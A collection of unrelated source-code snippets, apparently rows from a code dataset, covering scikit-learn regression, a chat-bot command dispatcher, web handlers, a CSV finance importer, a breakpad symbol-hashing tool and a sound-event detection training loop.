from sklearn.model_selection import cross_val_score

clf = svm.SVR(kernel='linear', C=1e3)
clf.fit(df_acc_X_train, df_acc_y_train)
np.mean((clf.predict(df_acc_X_test) - df_acc_y_test) ** 2)
clf.score(df_acc_X_test, df_acc_y_test)
# BUG FIX: 'neg_log_loss' is a classification metric and raises for SVR;
# use a regression scorer instead.
cross_val_score(clf, df_acc_X_test, df_acc_y_test, scoring='neg_mean_squared_error')

# --- Decision tree regression ---
from sklearn import tree

tlf = tree.DecisionTreeRegressor()
tlf = tlf.fit(df_acc_X_train, df_acc_y_train)
np.mean((tlf.predict(df_acc_X_test) - df_acc_y_test) ** 2)
tlf.score(df_acc_X_train, df_acc_y_train)
#cross_val_score(tlf, df_acc_X_test, df_acc_y_test, scoring='neg_log_loss')
987,169 | cd37772ee80d981dffdef5500dc2a854a873137d | #!/usr/bin/env python
# coding: utf-8
import yaml
from responses import *
def assign_response(message):
    """Map an incoming chat command to its response builder.

    Unknown commands, and argument-taking commands missing their argument,
    fall back to a random response.

    :param message: the raw chat message (case-insensitive)
    :return: the built response string from the matching builder
    """
    message = message.lower()
    words = message.split(' ')

    # Commands that take an argument after the trigger word.
    # BUG FIX: guard against a missing argument (previously IndexError).
    if words[0] == '.pasquale':
        return build_pasquale_response(words[1]) if len(words) > 1 else build_random_response()
    if words[0] in ('.salario', '.salário'):
        return build_salario_response(words[1]) if len(words) > 1 else build_random_response()

    # Exact-match commands dispatch straight to their builder.
    exact = {
        '.cilia': build_cilia_response,
        '.boulas': build_boulas_response,
        '.idelber': build_idelber_response,
        '.fazzi': build_fazzi_response,
        '.brasil-autoctone': build_braut_response,
        '.braut': build_braut_response,
        '.lucyborn': build_lucyborn_response,
        '.pupo': build_pupo_response,
        '.assis': build_assis_response,
        '#paradox': build_nazi_response,
        '.gamers': build_gamers_response,
    }
    return exact.get(message, build_random_response)()
|
987,170 | 38217b5e55cb9a359e2ce6048f0255132945d7ca | import time
from report import report_sxw
from osv import osv,fields
from report.render import render
import pooler
from tools.translate import _
from ad_num2word_id import num2word
import locale
from collections import OrderedDict
class bill_passing_parser(report_sxw.rml_parse):
    """RML report parser for account bill passing documents (OpenERP 6-era API)."""

    def __init__(self, cr, uid, name, context):
        # Delegate the standard report setup to the base rml_parse class.
        super(bill_passing_parser, self).__init__(cr, uid, name, context=context)
        #=======================================================================
        # Running line counter, available to the report template.
        self.line_no = 0
        # Expose `time` to the mako template context.
        self.localcontext.update({
            'time': time,
        })
report_sxw.report_sxw('report.bill.passing.report.form', 'account.bill.passing', 'ad_sales_agent_bitratex/account_bill_passing_report.mako', parser=bill_passing_parser,header=False) |
987,171 | f5a1ef2f0af81162f77199a22eb8bf632a60a1b6 | # -*- coding: utf-8 -*-
import os
from google.appengine.api import mail
from google.appengine.api import users
from google.appengine.ext import ndb
from datetime import datetime, timedelta
import jinja2
import webapp2
import uuid
import urllib
import urllib2
# Module-level Jinja2 environment: loads templates from this file's directory
# with autoescaping enabled.
JINJA_ENVIRONMENT = jinja2.Environment(
    loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
    extensions=['jinja2.ext.autoescape'],
    autoescape=True)
class MainPage(webapp2.RequestHandler):
    """Serve the landing page rendered from the fumao.html template."""

    def get(self):
        # No dynamic values yet: render the template with an empty context.
        page = JINJA_ENVIRONMENT.get_template('fumao.html')
        self.response.write(page.render({}))
application = webapp2.WSGIApplication([
('/', MainPage),
], debug=True) |
987,172 | 08988ecde5023f5852ccfb8b53c6d25e55dca2d0 | from django.shortcuts import render
from django.urls import path
from pages import views
urlpatterns = [
    # Root URL -> pages.views.HomeView.
    # NOTE(review): if HomeView is a class-based view this needs
    # `views.HomeView.as_view()`; confirm against pages/views.py.
    path('', views.HomeView, name='index'),
]
987,173 | 7949565c185eb67d675fdc4f5bb8996d72044aa7 | # 执行用时:124 ms
# 内存消耗:18.9 MB
# 方案:所有的亮灯都连续排列在数组最左边,没有间断; 那么本题目转化为:判断 当前时刻亮灯的最大编号 是否 等于亮灯的数量
class Solution:
def numTimesAllBlue(self, light: List[int]) -> int:
# 所有的亮灯都连续排列在数组最左边,没有间断
# 判断 当前时刻亮灯的最大编号 是否 等于亮灯的数量
rst, maxx = 0, 0
for idx, on_light in enumerate(light):
maxx = max(maxx, on_light)
if maxx == idx + 1:
rst += 1
return rst
|
987,174 | ae8c79203df733e42133e60d35130560d2af280a | MAGIC_NUM = 1000000007
left_cnt_P = [0 for _ in range(100010)]
s = input()
for i in range(len(s)):
if i > 0: left_cnt_P[i] = left_cnt_P[i - 1]
if s[i] == 'P': left_cnt_P[i] += 1
result = 0
right_num_T = 0
for i in range(len(s)-1,-1,-1):
if s[i] == 'T': right_num_T += 1
elif s[i] == 'A': result = (result + left_cnt_P[i]*right_num_T) % MAGIC_NUM
print(result)
|
987,175 | d38e7d4fdc7277a9e06dc8ebbd69ccc66631a321 | class Critter(object):
def __init__(self):
print("A new critter has been born!")
def talk(self):
print("\nHi, I'm an instance of class Critter.")
crit1 = Critter()
crit2 = Critter()
crit2.talk()
crit1.talk() |
987,176 | 268f0ead377365d540f4ad991fb6c62f2847a557 | import hmac, hashlib, sys, re
numfinder = re.compile('[0-9a-f]+$')
def encrypt(infd, outfd, hashphrase, prefix, striplinenumbers=False):
    """
    Read a breakpad .sym file from infd. Using the given hashphrase,
    one-way-hash any function and file names mentioned in the symbol file.

    `hashphrase` should be a secret, and should be the same every time this
    script is run.

    `prefix` is a vendor prefix, and should be a string provided by Mozilla.

    If `striplinenumbers` is true, remove all line number information
    from the symbols.

    This method returns a dictionary mapping the encrypted names back to
    the real names. When run from the command line, these will be saved in a
    log file.
    """
    # hash -> original name, filled in as names are encrypted below.
    namemap = {}
    def encryptname(name):
        # HMAC-SHA256 keyed on the secret phrase; prefix identifies the vendor.
        # NOTE(review): written for Python 2 — on Python 3 hmac.new requires
        # bytes keys/messages; confirm before porting.
        hash = prefix + hmac.new(hashphrase, name, digestmod=hashlib.sha256).hexdigest()
        namemap[hash] = name
        return hash
    for line in infd:
        line = line.strip()
        command, rest = line.split(None, 1)
        if command == 'FILE':
            # FILE <number> <name>: obfuscate the source file name.
            number, name = rest.split(None, 1)
            line = ' '.join([command, number, encryptname(name)])
        elif command == 'PUBLIC':
            # PUBLIC <address> <param_size> <name>
            address, psize, name = rest.split(None, 2)
            line = ' '.join([command, address, psize, encryptname(name)])
        elif command == 'FUNC':
            # FUNC <address> <size> <param_size> <name>
            address, size, psize, name = rest.split(None, 3)
            line = ' '.join([command, address, size, psize, encryptname(name)])
        elif command in ('STACK', 'MODULE'):
            pass # Nothing to encrypt
        elif numfinder.match(command):
            # Hex-prefixed records carry per-line number info; optionally drop
            # them, otherwise they fall through to the write below unchanged.
            if striplinenumbers:
                continue
        else:
            raise KeyError("Unexpected symbol instruction: '%s'" % command)
        outfd.write(line + '\n')
    return namemap
if __name__ == '__main__':
    from optparse import OptionParser
    import csv
    # CLI: encrypt a symbol file and dump the hash->name map as CSV on stdout.
    o = OptionParser(usage="usage: %prog [options] sourcefile destfile hashphrase prefix")
    o.add_option('-s', '--strip-line-numbers', action="store_true", dest="striplinenumbers", default=False)
    options, args = o.parse_args()
    if len(args) != 4:
        o.print_help()
        sys.exit(1)
    sourcefile, destfile, hashphrase, prefix = args
    sourcefd = open(sourcefile, 'r')
    destfd = open(destfile, 'w')
    omap = encrypt(sourcefd, destfd, hashphrase, prefix, options.striplinenumbers)
    sourcefd.close()
    destfd.close()
    # NOTE(review): iteritems() is Python 2 only; use items() on Python 3.
    w = csv.writer(sys.stdout)
    for e, name in omap.iteritems():
        w.writerow([e, name])
987,177 | b24c0ba3a5a0e9acc70d64e41b79f6100d197d31 | import requests
from django.shortcuts import render
def index(request):
    """Render index.html with the movie list fetched from the backend service."""
    # TODO: this is old api call
    # movies = requests.get("http://localhost:5000/Mato/movies")
    response = requests.get("http://localhost:5000/beautiful-movies")
    movie_list = response.json()
    return render(request, 'index.html', {'title': 'movies', 'movies': movie_list})
# Create your views here.
def time(request):
    """Render time.html with the current time string fetched from the backend."""
    backend_reply = requests.get("http://localhost:5000/time")
    current_time = backend_reply.content.decode("utf-8")
    return render(request, 'time.html', {'time': current_time})
|
987,178 | 64edaf346bd70b600f0f011464089b606f07cd3f | # -*- coding: utf-8 -*-
from core.models import Account
from core.models import AccountSplit
from core.models import Category
from core.models import CategorySplit
from core.models import Transaction
from csv import reader
from datetime import datetime
from decimal import Decimal
from django.core.exceptions import ObjectDoesNotExist
from fx import get_rate
from logging import getLogger
from re import search
logger = getLogger('importer.csv')
TYPE_REGEX = r'^.*\.csv$'
class CSVImport(object):
    """Importer for CSV transaction exports.

    process() parses every row into unsaved model instances held on the
    importer; save() then persists them in dependency order (categories,
    transactions, then splits referencing them).
    """

    def __init__(self):
        # File extension this importer handles.
        self.extension = 'csv'

    def is_supported(self, imported_file):
        # Supported when the uploaded file's name ends in ".csv".
        return search(TYPE_REGEX, imported_file.name)

    def process(self, wealth, imported_file, account):
        """Parse each CSV row of `imported_file` into in-memory objects.

        `account` is the account the export belongs to; nothing is written
        to the database until save() is called.
        """
        csv_file = imported_file.file
        rows = reader(csv_file)
        self.categories = [];
        self.transactions = [];
        self.category_splits = [];
        self.account_splits = [];
        self.wealth = wealth;
        for row in rows:
            self._process_row(row, account)

    def save(self):
        """Persist everything collected by process().

        Transactions are saved before their splits; each split re-fetches its
        transaction (and category) so the foreign keys point at saved rows.
        """
        for category in self.categories:
            category.save()
        for transaction in self.transactions:
            transaction.save()
        for split in self.account_splits:
            split.transaction = Transaction.objects.get(id=split.transaction.id)
            split.save()
        for split in self.category_splits:
            split.transaction = Transaction.objects.get(id=split.transaction.id)
            split.category = Category.objects.get(id=split.category.id)
            split.save()

    def _process_row(self, row, from_account):
        """Turn one CSV row into a transfer or deposit/withdrawal.

        Row layout (by index): 1=date YYYY-MM-DD, 2=description,
        3=category-or-account name, 4=amount. If the name matches an existing
        account, the row is a transfer; otherwise it is booked against a
        category (created on demand), with the sign deciding expense/income.
        """
        date = datetime.strptime(row[1], '%Y-%m-%d')
        description = row[2]
        category = row[3]
        amount = Decimal(row[4])
        try:
            to_account = Account.objects.get(
                wealth=self.wealth,
                name=category)
            self._create_transfer(
                from_account,
                to_account,
                date,
                description,
                amount)
        except ObjectDoesNotExist:
            if amount < 0:
                category_type = Category.TYPE_EXPENSE
                transaction_type = Transaction.TYPE_WITHDRAWAL
            else:
                category_type = Category.TYPE_INCOME
                transaction_type = Transaction.TYPE_DEPOSIT
            try:
                category = Category.objects.get(
                    wealth=self.wealth,
                    full_name=category,
                    type=category_type)
            except ObjectDoesNotExist:
                category = self._create_category(category, category_type)
            self._create_nontransfer(
                from_account,
                category,
                date,
                description,
                amount,
                transaction_type)

    def _create_transfer(self, from_account, to_account, date, description, amount):
        """Queue a transfer transaction plus mirrored splits on both accounts."""
        # A transfer to the same account would be a no-op; skip it.
        if from_account == to_account:
            return
        transaction = Transaction(
            type=Transaction.TYPE_TRANSFER,
            date=date,
            description=description,
            wealth=self.wealth)
        self.transactions.append(transaction)
        account_split = AccountSplit(
            account=from_account,
            amount=amount,
            date=date,
            transaction=transaction,
            type=Transaction.TYPE_TRANSFER,
            wealth=self.wealth)
        self.account_splits.append(account_split)
        # Mirror split on the receiving account with the sign flipped.
        account_split = AccountSplit(
            account=to_account,
            amount=amount * -1,
            date=date,
            transaction=transaction,
            type=Transaction.TYPE_TRANSFER,
            wealth=self.wealth)
        self.account_splits.append(account_split)

    def _create_nontransfer(self, from_account, category, date, description, amount,
            transaction_type):
        """Queue a deposit/withdrawal with an account split and an opposing
        category split."""
        transaction = Transaction(
            type=transaction_type,
            date=date,
            description=description,
            wealth=self.wealth)
        self.transactions.append(transaction)
        account_split = AccountSplit(
            account=from_account,
            amount=amount,
            date=date,
            transaction=transaction,
            type=transaction_type,
            wealth=self.wealth)
        self.account_splits.append(account_split)
        category_split = CategorySplit(
            category=category,
            date=date,
            amount=amount * -1,
            transaction=transaction,
            type=transaction_type,
            wealth=self.wealth)
        self.category_splits.append(category_split)

    def _create_category(self, name, category_type):
        """Create (and queue) every missing level of a colon-separated
        category hierarchy, e.g. "Food:Groceries"; return the leaf category."""
        hierarchy = name.split(':')
        accumulated = []
        parent = None
        for level in hierarchy:
            accumulated.append(level)
            try:
                category = Category.objects.get(
                    wealth=self.wealth,
                    type=category_type,
                    full_name=':'.join(accumulated))
            except ObjectDoesNotExist:
                category = Category(
                    wealth=self.wealth,
                    name=level,
                    balance=0,
                    type=category_type,
                    parent=parent)
                self.categories.append(category)
            parent = category
        return parent
|
987,179 | 248c7e1f0053cb3f6f3ea2c6dcaae60a7c1a4fa0 | from .main import main # noqa: F401
from .monomer import readPDB, createHolder, Holder # noqa: F401
|
987,180 | 92b3a8aee28c11e360058b259b260ef6e39e57a8 | import random
from itertools import combinations
from pathlib import Path
import torch.nn as nn
import h5py
import numpy as np
import torch
from methods.training import BaseTrainer
from methods.utils.data_utilities import to_metrics2020_format
class Trainer(BaseTrainer):
    """Trainer for the SELD (sound event localization and detection) task.

    Wraps an audio-feature extractor and a model, runs train/validation
    steps, and converts predictions into DCASE 2019/2020 metric formats.
    """

    def __init__(self, args, cfg, dataset, af_extractor, valid_set, model, optimizer, losses, metrics):
        super().__init__()
        self.cfg = cfg
        self.af_extractor = af_extractor
        self.model = model
        self.optimizer = optimizer
        self.losses = losses
        self.metrics = metrics
        self.cuda = args.cuda
        self.clip_length = dataset.clip_length
        self.label_resolution = dataset.label_resolution
        # Frames of input features per label frame.
        self.label_interp_ratio = int(self.label_resolution * cfg['data']['sample_rate'] / cfg['data']['hop_length'])

        # Load ground truth for dcase metrics
        self.num_segments = valid_set.num_segments
        self.valid_gt_sed_metrics2019 = valid_set.valid_gt_sed_metrics2019
        self.valid_gt_doa_metrics2019 = valid_set.valid_gt_doa_metrics2019
        self.gt_metrics2020_dict = valid_set.gt_metrics2020_dict

        # Scalar: per-bin mean/std used to normalize input features, read
        # from the precomputed HDF5 file matching the feature configuration.
        scalar_h5_dir = Path(cfg['hdf5_dir']).joinpath(cfg['dataset']).joinpath('scalar')
        fn_scalar = '{}_{}_sr{}_nfft{}_hop{}_mel{}.h5'.format(cfg['data']['type'], cfg['data']['audio_feature'],
            cfg['data']['sample_rate'], cfg['data']['n_fft'], cfg['data']['hop_length'], cfg['data']['n_mels'])
        scalar_path = scalar_h5_dir.joinpath(fn_scalar)
        with h5py.File(scalar_path, 'r') as hf:
            self.mean = hf['mean'][:]
            self.std = hf['std'][:]
        if args.cuda:
            self.mean = torch.tensor(self.mean, dtype=torch.float32).cuda()
            self.std = torch.tensor(self.std, dtype=torch.float32).cuda()

        self.init_train_losses()

    def init_train_losses(self):
        """ Initialize train losses

        The set of accumulated loss keys depends on which optional
        regularization term is enabled in the config (at most one is used).
        """
        if self.cfg['training']['weight_constraints']:
            self.train_losses = {
                'train_loss_all': 0.,
                'train_loss_sed': 0.,
                'train_loss_doa': 0.,
                'train_loss_weight_orthogonal': 0.
            }
        elif self.cfg['training']['weight_constraints_1']:
            self.train_losses = {
                'train_loss_all': 0.,
                'train_loss_sed': 0.,
                'train_loss_doa': 0.,
                'train_loss_weight_orthogonal_1': 0.
            }
        elif self.cfg['training']['layer_constraints']:
            self.train_losses = {
                'train_loss_all': 0.,
                'train_loss_sed': 0.,
                'train_loss_doa': 0.,
                'train_loss_layer_orthogonal': 0.
            }
        elif self.cfg['training']['layer_constraints_1']:
            self.train_losses = {
                'train_loss_all': 0.,
                'train_loss_sed': 0.,
                'train_loss_doa': 0.,
                'train_loss_layer_orthogonal_1': 0.
            }
        elif self.cfg['training']['smoothness_loss']:
            self.train_losses = {
                'train_loss_all': 0.,
                'train_loss_sed': 0.,
                'train_loss_doa': 0.,
                'train_loss_doa_smoothness': 0.
            }
        else:
            self.train_losses = {
                'train_loss_all': 0.,
                'train_loss_sed': 0.,
                'train_loss_doa': 0.
            }

    def train_step(self, batch_sample, epoch_it):
        """ Perform a train step

        Extracts features, forwards the model, backpropagates the configured
        loss and accumulates per-term losses into self.train_losses.
        """
        batch_x = batch_sample['waveform']
        data_type = batch_sample['data_type']
        batch_target = {
            'ov': batch_sample['ov'],
            'sed': batch_sample['sed_label'],
            'doa': batch_sample['doa_label'],
        }
        if self.cuda:
            batch_x = batch_x.cuda(non_blocking=True)
            batch_target['sed'] = batch_target['sed'].cuda(non_blocking=True)
            batch_target['doa'] = batch_target['doa'].cuda(non_blocking=True)

        self.optimizer.zero_grad()
        self.af_extractor.train()
        self.model.train()
        (batch_x, batch_target) = self.af_extractor((batch_x, batch_target,'train', data_type))
        # Normalize features with the precomputed dataset statistics.
        batch_x = (batch_x - self.mean) / self.std
        # SELD_ATT models also return an extra constraint head.
        if self.cfg['training']['model'] == 'SELD_ATT' or self.cfg['training']['model'] == 'SELD_ATT_LIGHT':
            pred, pred_constraint = self.model(batch_x)
        if self.cfg['training']['model'] == 'EINV2':
            pred = self.model(batch_x)
        if self.cfg['training']['model'] == 'SELD_ATT' or self.cfg['training']['model'] == 'SELD_ATT_LIGHT':
            loss_dict = self.losses.calculate_attention(pred, pred_constraint,batch_target, epoch_it,self.model)
        if self.cfg['training']['model'] == 'EINV2':
            loss_dict = self.losses.calculate(pred, batch_target, epoch_it, self.model)
        loss_dict[self.cfg['training']['loss_type']].backward(retain_graph=False)
        self.optimizer.step()

        self.train_losses['train_loss_all'] += loss_dict['all'].item()
        self.train_losses['train_loss_sed'] += loss_dict['sed'].item()
        self.train_losses['train_loss_doa'] += loss_dict['doa'].item()
        if self.cfg['training']['weight_constraints']:
            self.train_losses['train_loss_weight_orthogonal'] += loss_dict['loss_weight_orthogonal'].item()
        if self.cfg['training']['weight_constraints_1']:
            self.train_losses['train_loss_weight_orthogonal_1'] += loss_dict['loss_weight_orthogonal_1'].item()
        if self.cfg['training']['layer_constraints']:
            self.train_losses['train_loss_layer_orthogonal'] += loss_dict['loss_layer_orthogonal'].item()
        if self.cfg['training']['layer_constraints_1']:
            self.train_losses['train_loss_layer_orthogonal_1'] += loss_dict['loss_layer_orthogonal_1'].item()
        if self.cfg['training']['smoothness_loss']:
            self.train_losses['train_loss_doa_smoothness'] += loss_dict['loss_doa_smoothness'].item()

    def validate_step(self, generator=None, max_batch_num=None, valid_type='train', epoch_it=0):
        """ Perform the validation on the train, valid set

        Generate a batch of segmentations each time.
        valid_type 'train' just returns (and resets) the accumulated train
        losses; 'valid' runs inference over the generator and returns
        (losses, metric scores) in DCASE 2019/2020 formats.
        """
        # clearing cuda, because of memory leak
        if torch.cuda.is_available():
            torch.cuda.empty_cache()
        if valid_type == 'train':
            train_losses = self.train_losses.copy()
            self.init_train_losses()
            return train_losses

        elif valid_type == 'valid':
            pred_sed_list, pred_doa_list = [], []
            gt_sed_list, gt_doa_list = [], []
            loss_all, loss_sed, loss_doa, loss_orthogonal , loss_doa_smoothness = 0., 0., 0., 0., 0.

            for batch_idx, batch_sample in enumerate(generator):
                if batch_idx == max_batch_num:
                    break
                batch_x = batch_sample['waveform']
                data_type = batch_sample['data_type']
                batch_target = {
                    'sed': batch_sample['sed_label'],
                    'doa': batch_sample['doa_label']
                }
                if self.cuda:
                    batch_x = batch_x.cuda(non_blocking=True)
                    batch_target['sed'] = batch_target['sed'].cuda(non_blocking=True)
                    batch_target['doa'] = batch_target['doa'].cuda(non_blocking=True)
                with torch.no_grad():
                    self.af_extractor.eval()
                    self.model.eval()
                    (batch_x, batch_target) = self.af_extractor((batch_x, batch_target,valid_type, data_type ))
                    batch_x = (batch_x - self.mean) / self.std
                    if self.cfg['training']['model'] == 'SELD_ATT' or self.cfg['training']['model'] == 'SELD_ATT_LIGHT':
                        pred, pred_constraint = self.model(batch_x)
                    if self.cfg['training']['model'] == 'EINV2':
                        pred = self.model(batch_x)
                if self.cfg['training']['model'] == 'SELD_ATT' or self.cfg['training']['model'] == 'SELD_ATT_LIGHT':
                    loss_dict = self.losses.calculate_attention(pred, pred_constraint,batch_target, epoch_it, self.model)
                if self.cfg['training']['model'] == 'EINV2':
                    loss_dict = self.losses.calculate(pred,batch_target, epoch_it, self.model)
                # SED logits -> probabilities.
                pred['sed'] = torch.sigmoid(pred['sed'])
                loss_all += loss_dict['all'].cpu().detach().numpy()
                loss_sed += loss_dict['sed'].cpu().detach().numpy()
                loss_doa += loss_dict['doa'].cpu().detach().numpy()
                if self.cfg['training']['weight_constraints']:
                    loss_orthogonal += loss_dict['loss_weight_orthogonal'].cpu().detach().numpy()
                if self.cfg['training']['layer_constraints']:
                    loss_orthogonal += loss_dict['loss_layer_orthogonal'].cpu().detach().numpy()
                if self.cfg['training']['weight_constraints_1']:
                    loss_orthogonal += loss_dict['loss_weight_orthogonal_1'].cpu().detach().numpy()
                if self.cfg['training']['layer_constraints_1']:
                    loss_orthogonal += loss_dict['loss_layer_orthogonal_1'].cpu().detach().numpy()
                if self.cfg['training']['smoothness_loss']:
                    loss_doa_smoothness += loss_dict['loss_doa_smoothness'].cpu().detach().numpy()
                pred_sed_list.append(pred['sed'].cpu().detach().numpy())
                pred_doa_list.append(pred['doa'].cpu().detach().numpy())

            pred_sed = np.concatenate(pred_sed_list, axis=0)
            pred_doa = np.concatenate(pred_doa_list, axis=0)

            # Stitch segments back into whole clips and drop padding frames.
            origin_num_clips = int(pred_sed.shape[0]/self.num_segments)
            origin_T = int(pred_sed.shape[1]*self.num_segments)
            pred_sed = pred_sed.reshape((origin_num_clips, origin_T, 2, -1))[:, :int(self.clip_length / self.label_resolution)]
            pred_doa = pred_doa.reshape((origin_num_clips, origin_T, 2, -1))[:, :int(self.clip_length / self.label_resolution)]

            # Keep only the most probable class per track, then threshold.
            pred_sed_max = pred_sed.max(axis=-1)
            pred_sed_max_idx = pred_sed.argmax(axis=-1)
            pred_sed = np.zeros_like(pred_sed)
            for b_idx in range(origin_num_clips):
                for t_idx in range(origin_T):
                    for track_idx in range(2):
                        pred_sed[b_idx, t_idx, track_idx, pred_sed_max_idx[b_idx, t_idx, track_idx]] = \
                            pred_sed_max[b_idx, t_idx, track_idx]
            pred_sed = (pred_sed > self.cfg['training']['threshold_sed']).astype(np.float32)

            # convert Catesian to Spherical
            azi = np.arctan2(pred_doa[..., 1], pred_doa[..., 0])
            elev = np.arctan2(pred_doa[..., 2], np.sqrt(pred_doa[..., 0]**2 + pred_doa[..., 1]**2))
            pred_doa = np.stack((azi, elev), axis=-1) # (N, T, tracks, (azi, elev))

            # convert format
            pred_sed_metrics2019, pred_doa_metrics2019 = to_metrics2019_format(pred_sed, pred_doa)
            gt_sed_metrics2019, gt_doa_metrics2019 = self.valid_gt_sed_metrics2019, self.valid_gt_doa_metrics2019
            pred_dcase_format_dict = to_dcase_format(pred_sed, pred_doa)
            pred_metrics2020_dict = to_metrics2020_format(pred_dcase_format_dict,
                pred_sed.shape[0]*pred_sed.shape[1], label_resolution=self.label_resolution)
            gt_metrics2020_dict = self.gt_metrics2020_dict

            if self.cfg['training']['weight_constraints']:
                out_losses = {
                    'loss_all': loss_all / (batch_idx + 1),
                    'loss_sed': loss_sed / (batch_idx + 1),
                    'loss_doa': loss_doa / (batch_idx + 1),
                    'loss_orthogonal': loss_orthogonal / (batch_idx + 1),
                }
            elif self.cfg['training']['layer_constraints']:
                out_losses = {
                    'loss_all': loss_all / (batch_idx + 1),
                    'loss_sed': loss_sed / (batch_idx + 1),
                    'loss_doa': loss_doa / (batch_idx + 1),
                    'loss_layer_orthogonal': loss_orthogonal / (batch_idx + 1),
                }
            elif self.cfg['training']['weight_constraints_1']:
                out_losses = {
                    'loss_all': loss_all / (batch_idx + 1),
                    'loss_sed': loss_sed / (batch_idx + 1),
                    'loss_doa': loss_doa / (batch_idx + 1),
                    'loss_orthogonal_1': loss_orthogonal / (batch_idx + 1),
                }
            elif self.cfg['training']['layer_constraints_1']:
                out_losses = {
                    'loss_all': loss_all / (batch_idx + 1),
                    'loss_sed': loss_sed / (batch_idx + 1),
                    'loss_doa': loss_doa / (batch_idx + 1),
                    'loss_layer_orthogonal_1': loss_orthogonal / (batch_idx + 1),
                }
            elif self.cfg['training']['smoothness_loss']:
                out_losses = {
                    'loss_all': loss_all / (batch_idx + 1),
                    'loss_sed': loss_sed / (batch_idx + 1),
                    'loss_doa': loss_doa / (batch_idx + 1),
                    'loss_doa_smoothness': loss_doa_smoothness / (batch_idx + 1),
                }
            else:
                out_losses = {
                    'loss_all': loss_all / (batch_idx + 1),
                    'loss_sed': loss_sed / (batch_idx + 1),
                    'loss_doa': loss_doa / (batch_idx + 1),
                }
            pred_dict = {
                'dcase2019_sed': pred_sed_metrics2019,
                'dcase2019_doa': pred_doa_metrics2019,
                'dcase2020': pred_metrics2020_dict,
            }
            gt_dict = {
                'dcase2019_sed': gt_sed_metrics2019,
                'dcase2019_doa': gt_doa_metrics2019,
                'dcase2020': gt_metrics2020_dict,
            }
            metrics_scores = self.metrics.calculate(pred_dict, gt_dict)
            return out_losses, metrics_scores
def to_metrics2019_format(sed_labels, doa_labels):
    """Convert track-wise SED/DOA labels to the DCASE2019 metrics input format.

    Args:
        sed_labels: (batch_size, time_steps, num_tracks=2, num_classes) activities
        doa_labels: (batch_size, time_steps, num_tracks=2, 2) azimuth/elevation in radians
    Output:
        out_sed_labels: (batch_size * time_steps, num_classes) of 0.0/1.0
        out_doa_labels: (batch_size * time_steps, 2 * num_classes), azimuths
            in the first num_classes columns, elevations in the rest
    """
    batch_size, n_frames, n_tracks, n_classes = sed_labels.shape
    flat_sed = sed_labels.reshape(batch_size * n_frames, n_tracks, n_classes)
    flat_doa = doa_labels.reshape(batch_size * n_frames, n_tracks, 2)
    # A class counts as active in a frame when it is active on either track.
    out_sed_labels = np.logical_or(flat_sed[:, 0], flat_sed[:, 1]).astype(float)
    out_doa_labels = np.zeros((batch_size * n_frames, n_classes * 2))
    for track in range(n_tracks):
        frame_idx, class_idx = np.where(flat_sed[:, track, :])
        out_doa_labels[frame_idx, class_idx] = flat_doa[frame_idx, track, 0]  # azimuth
        out_doa_labels[frame_idx, class_idx + n_classes] = flat_doa[frame_idx, track, 1]  # elevation
    return out_sed_labels, out_doa_labels
def to_dcase_format(sed_labels, doa_labels):
    """Convert track-wise SED/DOA labels to the dcase output format.

    Args:
        sed_labels: (batch_size, time_steps, num_tracks=2, num_classes) activities
        doa_labels: (batch_size, time_steps, num_tracks=2, 2) azi/ele in radians
    Output:
        dict mapping each frame index that contains events to a list of
        [class_index, azimuth_deg, elevation_deg] entries (degrees, rounded).
    """
    batch_size, n_frames, n_tracks, n_classes = sed_labels.shape
    flat_sed = sed_labels.reshape(batch_size * n_frames, n_tracks, n_classes)
    flat_doa = doa_labels.reshape(batch_size * n_frames, n_tracks, 2)
    output_dict = {}
    for frame in range(batch_size * n_frames):
        for track in range(n_tracks):
            active = list(np.where(flat_sed[frame, track, :])[0])
            # At most one class may be active per track per frame.
            assert len(active) <= 1, 'class_index should be smaller or equal to 1!!\n'
            if active:
                azi_deg = int(np.around(flat_doa[frame, track, 0] * 180 / np.pi))
                ele_deg = int(np.around(flat_doa[frame, track, 1] * 180 / np.pi))
                output_dict.setdefault(frame, []).append([active[0], azi_deg, ele_deg])
    return output_dict
|
987,181 | 44bab4f6e625ef9aa610b31c7a36f1f0caef74b5 | # This problem was asked by Google.
#
# You are given an array of nonnegative integers. Let's say you start at the beginning of the array and are trying to
# advance to the end. You can advance at most, the number of steps that you're currently on. Determine whether you
# can get to the end of the array.
#
# For example, given the array [1, 3, 1, 2, 0, 1], we can go from indices 0 -> 1 -> 3 -> 5, so return true.
#
# Given the array [1, 2, 1, 0, 0], we can't reach the end, so return false.
"""This is another flavor of reaching the top of stairs problem, I think. Which means it should be solvable with
dynamic programming
I think a 1-D array of boolean should be enough.
Let P(i) be if the i-th step/index is reachable from the beginning of the array
then P(i) = True if P(i - V(i)) is True, where V(i) is a range of value 0 <= value of element of i-th index,
otherwise False.
Then we return the last element of P
"""
##Google
##DP
##DynamicProgramming
from typing import List
def step_counting(lis: List[int]) -> bool:
    """Return True if the end of `lis` is reachable starting from index 0,
    where each element is the maximum number of indices you may advance.

    Greedy furthest-reach scan: O(n) time, O(1) space (the original DP was
    O(n * v) time, O(n) space). Also fixes the single-element edge case:
    a one-element list starts at its own end, so it is always reachable
    (the DP returned False for [0]).

    Raises AssertionError on an empty list or a negative element.
    """
    assert lis
    assert all(x >= 0 for x in lis)
    last = len(lis) - 1
    furthest = 0  # furthest index reachable so far
    for i, steps in enumerate(lis):
        if i > furthest:
            # Index i (and everything after it) is unreachable.
            return False
        furthest = max(furthest, i + steps)
        if furthest >= last:
            return True
    return True
# Self-checks from the problem statement; run at import time.
assert step_counting([1, 3, 1, 2, 0, 1])
assert step_counting([3, 0, 0, 0])
assert not step_counting([0, 1, 2, 3, 2])
assert not step_counting([1, 2, 1, 0, 0])
|
987,182 | 037dbc48ea9ff2ea2a3313f584f546a19d71311a | import FWCore.ParameterSet.Config as cms
from CondTools.SiPixel.SiPixelGainCalibrationService_cfi import *
from RecoLocalTracker.SiPixelClusterizer.SiPixelClusterizer_cfi import siPixelClusters as _siPixelClusters
# Clone the default CPU pixel clusterizer for the "pre-splitting" step.
siPixelClustersPreSplitting = _siPixelClusters.clone()

from Configuration.ProcessModifiers.gpu_cff import gpu
from RecoLocalTracker.SiPixelClusterizer.siPixelClustersHeterogeneous_cfi import siPixelClustersHeterogeneous as _siPixelClustersHeterogeneous
from RecoLocalTracker.SiPixelClusterizer.siPixelFedCablingMapGPUWrapper_cfi import *
from CalibTracker.SiPixelESProducers.siPixelGainCalibrationForHLTGPU_cfi import *
# When the "gpu" process modifier is active, replace the CPU clusterizer
# with the heterogeneous (GPU-capable) one.
